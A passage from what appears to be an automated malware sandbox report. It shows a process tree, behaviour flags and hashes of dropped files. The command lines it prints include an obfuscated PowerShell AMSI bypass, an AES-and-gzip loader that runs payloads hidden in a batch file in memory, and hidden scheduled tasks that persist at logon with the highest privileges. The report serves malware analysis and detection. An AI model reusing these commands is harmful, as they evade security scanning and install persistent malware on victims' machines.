@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GZpHqajJJKr=$mLEOSOvHxyzZT.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+'d'+'u'+''+'l'+''+'e'+'H'+'a'+''+'n'+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$oLaaaTtPeZmmxW=$XSODmByomeFYhI.Invoke($Null,@([Object]$GZpHqajJJKr,[Object]('L'+'o'+'a'+'d'+''+'L'+''+'i'+''+'b'+''+[Char](114)+'a'+'r'+''+'y'+''+[Char](65)+'')));$DMBmYJdimSNRoymQi=$XSODmByomeFYhI.Invoke($Null,@([Object]$GZpHqajJJKr,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$RZPumCE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oLaaaTtPeZmmxW,$JlGxeElggKGGKDqObkC).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+[Char](100)+'ll');$MDAhfOyPFUPYWlZEr=$XSODmByomeFYhI.Invoke($Null,@([Object]$RZPumCE,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'Sc'+'a'+''+[Char](110)+''+'B'+''+[Char](117)+''+'f'+'f'+[Char](101)+''+[Char](114)+'')));$puXAHIgegY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DMBmYJdimSNRoymQi,$FTxdBemZQCPbOlMLVcPtpl).Invoke($MDAhfOyPFUPYWlZEr,[uint32]8,4,[ref]$puXAHIgegY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MDAhfOyPFUPYWlZEr,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DMBmYJdimSNRoymQi,$FTxdBemZQCPbOlMLVcPtpl).Invoke($MDAhfOyPFUPYWlZEr,[uint32]8,0x20,[ref]$puXAHIgegY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+'s'+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New1.bat"2⤵
- Suspicious use of WriteProcessMemory
    -
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\New1.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\New1.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
      -
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_301_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_301.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      -
      C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_301.vbs"
      - Suspicious use of WriteProcessMemory
        -
        C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_301.bat" "
        - Suspicious use of WriteProcessMemory
          -
          C:\Windows\System32\Conhost.exe
          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          -
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_301.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_301.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
            -
            C:\Users\Admin\AppData\Local\Temp\Install.exe
            "C:\Users\Admin\AppData\Local\Temp\Install.exe"
            - Executes dropped EXE
            -
            C:\Users\Admin\AppData\Local\Temp\New.exe
            "C:\Users\Admin\AppData\Local\Temp\New.exe"
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory
              -
              C:\Windows\SysWOW64\SCHTASKS.exe
              "SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST
              - Creates scheduled task(s)
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
-
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
-
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
-
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
-
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize 2KB
MD5 8ba8fc1034d449222856ea8fa2531e28
SHA1 7570fe1788e57484c5138b6cead052fbc3366f3e
SHA256 2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2
SHA512 7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 17KB
MD5 bc6a86437194bfa626eae49dc94bba2d
SHA1 3a80cfe1754955ec899c013f5fdc068e193b6962
SHA256 284d9cfa3d1ac402c04cbc046c7dc2fef7ef5dc9d739c3806d2f256e4dbf9b0e
SHA512 de79790fbf1cce40b0a9b2890024986c9a3dd90c155103296db51dfea1d18ddf868b42f6fd8ba0eabefcb3945c8a2ee8a80ee2cbe07a69f99d40b0838afb4ce3
-
C:\Users\Admin\AppData\Local\Temp\Install.exe
Filesize 163KB
MD5 b51552b77057c2405f73bbbf9c89234a
SHA1 4793adbba023f90d2d2ad0ec55199c56de815224
SHA256 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0
SHA512 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66
-
C:\Users\Admin\AppData\Local\Temp\New.exe
Filesize 409KB
MD5 cf570b21f42f0ce411b7c9961068931e
SHA1 f92aa688a1dbd64a4585ecfe80a9c2d7f408c57d
SHA256 d0c4045c70a0822806a4e56d7883821cd2c19362f1cfed3bcbdb1e1b8eb15234
SHA512 de9dce8300656cd8531569011d043373193cbda125b738e66a5bf107178b48781d6dc88eea696b2074c352a1bf56a4693cfae62e668993ac24ce18aebfdcd684
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ywvylc5f.rld.ps1
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\startup_str_301.bat
Filesize 1002KB
MD5 f6d5bfaee8a55ff72c7b453fda066d62
SHA1 7d737d53013990e5d05076b7206e43eb4793fc7f
SHA256 3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308
SHA512 e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284
-
C:\Users\Admin\AppData\Roaming\startup_str_301.vbs
Filesize 115B
MD5 deec8143631052743e93d5e0a2741c54
SHA1 43369d421e49028bddce2620e2637c2daecc7382
SHA256 1203d2de4d471291c63409f01835f74dfaa320486d9f9705e6d68c28abc4b853
SHA512 78642c0dfb1c5258405c86263975ebe9f6edee744b58c6ee3b1a91b27163c451cc69492beddcdc169a377716a140d31eb0b7fe38665b4a376948c956c5939552
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize 338B
MD5 fa88c90dca47790f22143feecb47d5fe
SHA1 437589b0cb20e84ceb460329cd727a509ee7304b
SHA256 74ebd2a533693d0719c2f0ae5f36c4396a7b19df67ffd9071f2aab40caf71978
SHA512 c9cd52917725ac46186fbda8c488cebb3439ca3540097d58a6f4aeacbba379bf1fa005407e08b69d4476ca6e3172c75e5de6b2fa091c7eaa4c8a06b149f470ea
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
Filesize 412B
MD5 ed913da46cb8ccd4a57796c6aaec488d
SHA1 2800a7f724826345bb6c7c00b2640421b676005d
SHA256 4a5f559ce00f8fb6817734b15dd5d8998972770e5889f08673e118674301a40c
SHA512 b00673889a78f09d9c8717e3ff34f4865510ba65adb916ab03725a4e2246c75adc8dc04441f30c42d34db6d2b777e5939b6b8f5a16f7f4f84d47c1ce62f4038c